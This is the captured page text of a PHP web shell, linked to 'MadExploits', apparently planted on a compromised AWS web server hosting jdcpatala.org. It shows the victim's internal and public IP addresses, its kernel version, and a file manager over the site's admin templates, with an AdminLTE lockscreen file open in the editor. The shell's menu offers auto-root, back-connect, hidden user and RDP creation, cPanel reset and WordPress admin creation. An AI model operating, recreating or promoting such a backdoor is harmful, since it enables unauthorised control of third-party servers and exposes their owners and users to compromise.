Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.149.213
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
pages /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
404.html
28.43
KB
-rw-r--r--
500.html
28.38
KB
-rw-r--r--
blank.html
28.3
KB
-rw-r--r--
contacts.html
42.93
KB
-rw-r--r--
e_commerce.html
36.74
KB
-rw-r--r--
forgot-password.html
2.29
KB
-rw-r--r--
invoice-print.html
4.86
KB
-rw-r--r--
invoice.html
33.82
KB
-rw-r--r--
language-menu.html
28.86
KB
-rw-r--r--
legacy-user-menu.html
29.39
KB
-rw-r--r--
lockscreen.html
2.27
KB
-rw-r--r--
login.html
3.2
KB
-rw-r--r--
pace.html
28.49
KB
-rw-r--r--
profile.html
44.17
KB
-rw-r--r--
project_add.html
30.75
KB
-rw-r--r--
project_detail.html
34.46
KB
-rw-r--r--
project_edit.html
34.15
KB
-rw-r--r--
projects.html
52.18
KB
-rw-r--r--
recover-password.html
2.48
KB
-rw-r--r--
register.html
3.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lockscreen.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>AdminLTE 3 | Lockscreen</title> <!-- Tell the browser to be responsive to screen width --> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Font Awesome --> <link rel="stylesheet" href="../../plugins/fontawesome-free/css/all.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="../../dist/css/adminlte.min.css"> <!-- Google Font: Source Sans Pro --> <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700" rel="stylesheet"> </head> <body class="hold-transition lockscreen"> <!-- Automatic element centering --> <div class="lockscreen-wrapper"> <div class="lockscreen-logo"> <a href="../../index2.html"><b>Admin</b>LTE</a> </div> <!-- User name --> <div class="lockscreen-name">John Doe</div> <!-- START LOCK SCREEN ITEM --> <div class="lockscreen-item"> <!-- lockscreen image --> <div class="lockscreen-image"> <img src="../../dist/img/user1-128x128.jpg" alt="User Image"> </div> <!-- /.lockscreen-image --> <!-- lockscreen credentials (contains the form) --> <form class="lockscreen-credentials"> <div class="input-group"> <input type="password" class="form-control" placeholder="password"> <div class="input-group-append"> <button type="button" class="btn"><i class="fas fa-arrow-right text-muted"></i></button> </div> </div> </form> <!-- /.lockscreen credentials --> </div> <!-- /.lockscreen-item --> <div class="help-block text-center"> Enter your password to retrieve your session </div> <div class="text-center"> <a href="login.html">Or sign in as a different user</a> </div> <div class="lockscreen-footer text-center"> Copyright © 2014-2019 <b><a href="http://adminlte.io" class="text-black">AdminLTE.io</a></b><br> All rights reserved </div> </div> <!-- /.center --> <!-- jQuery --> <script src="../../plugins/jquery/jquery.min.js"></script> <!-- Bootstrap 4 --> <script src="../../plugins/bootstrap/js/bootstrap.bundle.min.js"></script> </body> </html>
Close